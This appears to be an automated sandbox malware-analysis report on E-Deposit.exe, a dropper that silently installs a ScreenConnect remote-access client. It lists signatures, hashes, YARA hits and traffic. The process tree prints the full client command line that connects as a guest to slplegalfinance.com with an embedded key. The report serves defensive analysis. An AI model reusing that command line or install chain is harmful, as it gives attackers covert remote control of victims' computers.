Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
E-Deposit.exe

Overview

General Information

Sample name:E-Deposit.exe
Analysis ID:1584729
MD5:70d47fa2e078f04400d3d1b236245678
SHA1:987aa3368265fc300b10b4128d8367c3d7a29c6c
SHA256:b0a8d541b650ffff1bb4b3690af389e52b1675212129560dbe33038b1041266b
Tags:ConnectWiseexeuser-CodeOmegaDelta
Infos:

Detection

ScreenConnect Tool
Score:66
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • E-Deposit.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\E-Deposit.exe" MD5: 70D47FA2E078F04400D3D1B236245678)
    • msiexec.exe (PID: 6672 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 5524 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 1020 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0753C52DEC0A493B425F25C67CDC614C C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 3748 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI8413.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5866656 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 6224 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding FCB4ADDE1767C5B22D934331E22A67F2 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1900 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9CCC608124B9911F2B52810F2F7C9978 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 4712 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=2d5fcbc9-2c6e-47f4-840c-d5cb02c072a5&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 1496 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "24f3f134-385f-4f81-b2ec-597f84d7215f" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
E-Deposit.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Windows\Temp\~DFF423B0FC94823B9E.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Installer\inprogressinstallinfo.ipiJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Temp\~DF41AC279AF635B4E9.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\Windows\Temp\~DF509A2F73A7E7DE00.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            C:\Windows\Temp\~DFD2EA35DDCAE5FE75.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Click to see the 5 entries
              SourceRuleDescriptionAuthorStrings
              00000000.00000002.2031799419.0000000005C60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000009.00000000.2064444724.0000000000772000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000009.00000002.3269847777.0000000002901000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    00000000.00000000.2005812083.00000000002B6000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      00000000.00000002.2035925464.0000000007AB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        Click to see the 4 entries
                        SourceRuleDescriptionAuthorStrings
                        0.2.E-Deposit.exe.5c60000.7.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          9.0.ScreenConnect.WindowsClient.exe.770000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            9.2.ScreenConnect.WindowsClient.exe.297fa10.1.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              0.2.E-Deposit.exe.5c60000.7.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                0.0.E-Deposit.exe.365db0.3.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                  Click to see the 3 entries
                                  No Sigma rule has matched
                                  No Suricata rule has matched

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: E-Deposit.exeVirustotal: Detection: 31%Perma Link
                                  Source: E-Deposit.exeReversingLabs: Detection: 26%
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.6% probability
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 8_2_03BD1638 CryptProtectData,8_2_03BD1638
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 8_2_03BD1630 CryptProtectData,8_2_03BD1630
                                  Source: C:\Users\user\Desktop\E-Deposit.exeEXE: msiexec.exeJump to behavior

                                  Compliance

                                  barindex
                                  Source: C:\Users\user\Desktop\E-Deposit.exeEXE: msiexec.exeJump to behavior
                                  Source: E-Deposit.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: E-Deposit.exeStatic PE information: certificate valid
                                  Source: E-Deposit.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb_ source: ScreenConnect.ClientService.exe, 00000008.00000002.3267762212.0000000000987000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: E-Deposit.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: E-Deposit.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: E-Deposit.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3286003214.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3281280450.0000000012910000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: E-Deposit.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3285086355.000000001B5C2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3284914571.000000001B580000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3269847777.0000000002901000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: E-Deposit.exe
                                  Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3294876651.00000000049F0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2053356265.0000000000F7D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: E-Deposit.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2028961136.0000000004F00000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027178364.000000000507E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3267762212.0000000000987000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: E-Deposit.exe, 598741.rbs.3.dr, MSI89D0.tmp.3.dr, 598740.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, MSI89E1.tmp.3.dr, 598742.msi.3.dr, MSI8F8F.tmp.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2027178364.000000000500F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: E-Deposit.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3286003214.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3281280450.0000000012910000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2064444724.0000000000772000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: E-Deposit.exe, MSI8413.tmp.2.dr, 598740.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, 598742.msi.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3284116635.000000001B222000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2064444724.0000000000772000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3284116635.000000001B222000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.3286003214.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3281280450.0000000012910000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: E-Deposit.exe
                                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                                  Networking

                                  barindex
                                  Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficDNS traffic detected: DNS query: slplegalfinance.com
                                  Source: E-Deposit.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3281280450.0000000012910000.00000004.00000800.00020000.00000000.sdmp, E-Deposit.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: E-Deposit.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: E-Deposit.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: E-Deposit.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: E-Deposit.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: E-Deposit.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3281280450.0000000012910000.00000004.00000800.00020000.00000000.sdmp, E-Deposit.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: E-Deposit.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                                  Source: E-Deposit.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: E-Deposit.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: E-Deposit.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.00000000014D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.3294876651.00000000049F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slplegalfinance.com:443/
                                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.3294876651.00000000049F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slplegalfinance.com:443/8
                                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.0000000001901000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.00000000017F3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.00000000017D9000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.0000000001889000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.0000000001743000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.000000000172D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.00000000014D1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.0000000001666000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://slplegalfinance.com:443/d
                                  Source: rundll32.exe, 00000005.00000003.2027178364.000000000500F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027343926.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027178364.000000000507E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                  Source: rundll32.exe, 00000005.00000003.2027178364.000000000500F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027343926.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027178364.000000000507E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                                  Source: rundll32.exe, 00000005.00000003.2027178364.000000000500F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027343926.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027178364.000000000507E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                                  Source: E-Deposit.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                                  Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
